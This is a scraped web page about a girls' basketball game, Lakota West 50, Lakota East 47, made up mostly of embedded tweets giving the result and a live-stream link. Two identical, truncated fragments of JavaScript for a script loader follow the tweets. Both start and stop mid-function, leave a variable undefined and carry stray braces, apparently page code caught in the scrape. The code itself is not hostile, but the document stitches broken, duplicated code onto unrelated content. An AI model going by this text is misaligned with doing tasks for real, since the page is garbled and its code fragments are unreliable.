Girls Basketball
Girls Basketball outlast East 50-47!
— Lakota West Girls Basketball (@LakotaWestGB) December 5, 2021
It’s a final. Lakota West 50 Lakota East 47. @LakotaWestAD @gmcsports #WEareLakota #AAGF pic.twitter.com/bh5oBjMckv
— FirebirdTweets (@FirebirdTweets) December 4, 2021
Watch Live Now!!! Lakota East Thunderhawks @ Lakota West Firebirds Girls Varsity Basketbal… https://t.co/eh7U8D2F0E via @YouTube @LakotaWestAD @LWHSRedSea
— LWHS Athletics (@westfirebirds) December 4, 2021
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();